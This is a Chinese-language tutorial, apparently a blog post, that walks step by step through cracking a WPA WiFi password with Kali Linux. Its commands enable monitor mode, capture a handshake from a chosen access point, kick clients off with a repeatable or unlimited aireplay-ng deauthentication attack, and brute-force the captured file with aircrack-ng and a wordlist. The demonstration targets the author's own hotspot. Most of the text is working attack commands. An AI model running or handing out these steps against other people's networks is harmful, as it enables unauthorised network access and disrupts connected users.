准备工具：

	一：kali linux系统
	二：外置无线网卡（需支持监听）
	三：强大的密码字典

第一步：

设置无线网卡为(monitor)监听模式:

 ifconfig wlan0 down # 关闭网卡
 iwconfig wlan0 mode monitor # 启动监听
 ifconfig wlan0 up # 启动网卡

第二步：

开始监听：

airodump-ng wlan0

找到我们的目标（我手机热点），

第三步：

我们只需要记住目标WiFi的bssid与信道(ch)就行了，通过命令抓取握手包：

airodump-ng --bssid 12:8E:63:B4:E8:E7 -w hww -c 11 wlan0

–bssid：指定bssid；-w：指定保存的文件名；-c：指定信道。

执行结果：

第四步：

强制断开客户端连接，使其重新发送握手包：

记住bssid与其中一个station(客户端mac地址)，执行命令进行断开连接攻击：

aireplay-ng -0 50 -a 12:8E:63:B4:E8:E7 -c 50:89:65:1A:D1:99 wlan0

-0 50: -0表示断开连接攻击，50表示攻击50次，也可以-0 0表示攻击无限次(ctrl+c可停止)；-a指定bssid；-c指定客户端mac地址
执行结果：

当出现下图情况，即为抓到握手包，ctrl+c结束任务即可：

ls查看一下：

这个后缀名为.cap文件就是我们接下来要进行破解的握手包。

第五步：

破解握手包：

首先你要准备一个字典，作为演示，这里我们自己创建一个：

“66666666”是我热点的密码。
然后输入命令进行破解：

aircrack-ng -w zd.txt hww-01.cap 

-w：指定字典
成功找到密码：

注：此方法不是唯一方法，pin码破解和钓鱼等也可以得到WiFi密码，本文只是方法之一。